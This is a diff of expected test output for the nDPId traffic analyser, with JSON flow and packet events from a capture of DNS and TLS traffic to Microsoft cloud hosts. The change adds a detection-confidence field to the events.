 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1626168077441,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1626168077441,"pkt":"WNVuaKQA8BiYFWV8CABFAABlf9gAAEARKH\/AqAF5CAgICP\/UADUAUcNfVk0BAAABAAAAAAAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAQ=="}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"}
 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1626168077486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"ts_msec":1626168077486,"pkt":"8BiYFWV8WNVuaKQACABFAADs3EYAAHkRkokICAgIwKgBeQA12Q8A2KuGXeWBgAABAAIAAQAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQABwAwABQABAAAN4AAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAAG0ANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTEtZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8B0AAYAAQAAADsAMwRwcmQxDmF6dXJlZG5zLWNsb3VkwEoGbXNuaHN0wBEAACcRAAADhAAAASwACTqAAAAAPA=="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"}
 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1626168077507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"ts_msec":1626168077507,"pkt":"8BiYFWV8WNVuaKQACABFAACx7P0AAHkRgg0ICAgIwKgBeQA1\/9QAnZiFVk2BgAABAAAAAQAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAcAlAAYAAQAAADsAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMBAAAAnEQAAA4QAAAEsAAk6gAAAADw="}
-00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01380{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01406{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/efAAAEARLo3AqAF5CAgICMikADUAK6rjycUBAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAABBAAE="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/el4AAEARLh\/AqAF5CAgICOMxADUAK47tCy8BAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAE="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1626168077604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1626168077604,"pkt":"8BiYFWV8WNVuaKQACABFAAETO6UAAHgRNAQICAgIwKgBeQA1yKQA\/zFnycWBgAABAAMAAQAAA3d3dwltaWNyb3NvZnQDY29tAABBAAHADAAFAAEAAAelACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAHAANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAAZABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKgABgABAAAAMgAxBm4wZHNjYsCtCmhvc3RtYXN0ZXIGYWthbWFpwBpg7VdYAAAD6AAAA+gAAAPoAAAHCA=="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
